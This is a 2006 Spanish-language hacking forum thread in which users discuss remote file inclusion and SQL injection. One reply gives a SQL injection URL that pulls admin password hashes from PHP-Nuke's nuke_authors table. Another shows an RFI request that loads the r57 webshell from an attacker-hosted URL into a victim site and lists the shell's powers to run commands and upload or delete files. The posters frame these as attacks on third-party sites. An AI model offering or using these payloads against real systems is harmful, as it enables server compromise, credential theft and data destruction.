elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 01:07  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  DUDA
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: DUDA  (Leído 1,856 veces)
marketes

Desconectado Desconectado

Mensajes: 32


Ver Perfil
DUDA
« en: 13 Noviembre 2006, 13:30 »

Hola buenas, que vulnerabilidad era esa que la pagina permitia poner una pagina externa dentro, del tipo index.php?site=(tu xploit) por ejemplo, eske no recuerdo, saludos y gracas.

PS: Perdon si me he explikado mal.
En línea
skapunky
Wizard Lv 69 &
CoAdmin
***
Desconectado Desconectado

Mensajes: 3.344



Ver Perfil WWW
Re: DUDA
« Respuesta #1 en: 13 Noviembre 2006, 13:50 »

Esa especifica no me acuerdo... pero hay una que es la siguiente:

Código:
modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

Con esta sacas el hash, etc.... Para hacer lo que quieres hacer hay otros caminos, por ejemplo usar el codigo que e puesto yo, o cualquier de estos y cambiar el inicio por la pagina que quieras... No te cierres en un solo bug, hay otros mas sencillos que quizas puedas llegar al mismo fin.

Saludos.
En línea

s0cratex

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: DUDA
« Respuesta #2 en: 13 Noviembre 2006, 16:15 »

Yo creo que el preguntaba sobre "Remote File Inclusion", no SQL injection, además no especificó un PHP Script... bye
« Última modificación: 13 Noviembre 2006, 16:24 por s0cratex » En línea

------------------------------------
.:[| s0cratex security crazy |]:.
------------------------------------
marketes

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Re: DUDA
« Respuesta #3 en: 13 Noviembre 2006, 17:24 »

si, gracias, me referia RFI s0cratex no me acordaba gracias, pero gracias tambien a skapunky, saludos!!

PS: Buena pagina skapunky!
« Última modificación: 13 Noviembre 2006, 17:26 por marketes » En línea
marketes

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Re: DUDA
« Respuesta #4 en: 13 Noviembre 2006, 19:27 »

Sabeis porque cuando voy a lanzar el exploit (r57 para ser exactos) en vez de salir el exploit correctamente me sale el codigo fuente???? lo guardo con .php en teoria me tenia que salir normal...no entiendo...help!

saludoos!
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: DUDA
« Respuesta #5 en: 14 Noviembre 2006, 01:28 »

r57?

al decir r57 te debes referir al "RST" que es un equipo, y no un exploit.

Para que los PHP funcionen, deben de ser ejecutados desde la consola, con el interprete de PHP.

busca info en el foro, el tema se ha tratado muchas veces.

Saludos!!
En línea

kanzix

Desconectado Desconectado

Mensajes: 20

{PHP && PERL}


Ver Perfil
Re: DUDA
« Respuesta #6 en: 14 Noviembre 2006, 03:30 »

Sabeis porque cuando voy a lanzar el exploit (r57 para ser exactos) en vez de salir el exploit correctamente me sale el codigo fuente???? lo guardo con .php en teoria me tenia que salir normal...no entiendo...help!

saludoos!
Eso es porque no existe RFI en el sistema que lo estas probando, tambien puede ser que lo hagas mal supongo que lo haces asi:

www.victima.com/scripvulnerable.php?variablevulnerable=http://atacante.con/r57.txt?

tambien intenta probar con la c99

r57?

al decir r57 te debes referir al "RST" que es un equipo, y no un exploit.

Para que los PHP funcionen, deben de ser ejecutados desde la consola, con el interprete de PHP.

busca info en el foro, el tema se ha tratado muchas veces.

Saludos!!

no, la r57 es un script en php que te da una shell en el sistema vulnerable a rfi, tambien tiene opciones como subir archivos al servidor,ejecutar comandos,navegar por los archivos, crear archivos, borrar archivos etc. todo esto mientras tengas permisos en el directorio o no este en safe mode on

saludos
En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: DUDA
« Respuesta #7 en: 14 Noviembre 2006, 16:48 »

No, R57 es el nombre del team xD
http://rst.void.ru

la webshell se llama r57shell.php

Saludos!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines